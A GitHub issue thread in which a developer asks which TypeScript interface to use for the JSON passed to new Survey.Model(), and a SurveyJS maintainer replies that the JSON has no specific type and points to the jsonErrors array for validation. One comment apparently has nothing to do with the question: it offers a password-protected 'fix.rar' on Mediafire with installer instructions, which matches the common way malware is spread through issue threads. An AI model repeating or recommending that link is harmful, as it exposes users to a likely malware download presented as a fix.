### ISSUE TITLE
SurveyJS - React - Typescript: Question about which possible interface(s) to use for the new Survey.Model() argument?

### ISSUE THREAD

**Issue by hectorleiva** [surveyjs/survey-library#8750]
### Are you requesting a feature, reporting a bug or asking a question?
Question

### What is the current behavior?
Unable to determine which Typescript type/interface to declare for the object that is meant for the `new Survey.Model()`

### What is the expected behavior?
Declaring a Typescript type/interface to be possible for the `new Survey.Model()` method.

I haven't been able to understand from the docs or from code examples how to properly define the type for an object that would be used as an argument for the `new Survey.Model()`. The benefits of course are that we can ensure that an engineer doesn't pass:

```
const surveyModel = { title: "Page 1", blahblahblah: false }
```

or any other verboten or incorrect properties. It seems like there is no interface that could be used from the SurveyJS library that would help define what the object's interface would look like since there are so many possible permutations; but I wanted to double check with the SurveyJS team to make sure that that is the case.

### How would you reproduce the current behavior (if this is a bug)?
N/A

#### Provide the test code and the tested page URL (if applicable)

Below is a basic Typescript interface attempt at the object that would ultimately go into the `new Survey.Model()`, but currently errors out due to valid JSON keys being flagged as errors.

Tested page URL: https://codesandbox.io/p/sandbox/surveyjs-1-8-63-types-forked-p4xzh5?file=%2Fsrc%2FApp.tsx%3A39%2C11&workspaceId=f9d6236a-9d1a-40a5-8f61-f75151aeb082

### Specify your

* browser: Chrome
* browser version: 127.0.6533.120
* surveyjs platform (angular or react or jquery or knockout or vue): React
* surveyjs version: 1.8.63

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JaneSjs** [comment]
Hello @hectorleiva,
A JSON layout object doesn't have a particular type. If you wish to validate a survey JSON definition and ensure that it is valid, instantiate a SurveyModel and check its [`jsonErrors`](https://surveyjs.io/form-library/documentation/api-reference/survey-data-model#jsonErrors) array. 
```
var survey = Survey.SurveyModel(yourJSON);
if(!!survey.jsonErrors) {
  // Could not parse something
  //...
}
```
Let us know it you have additional questions.
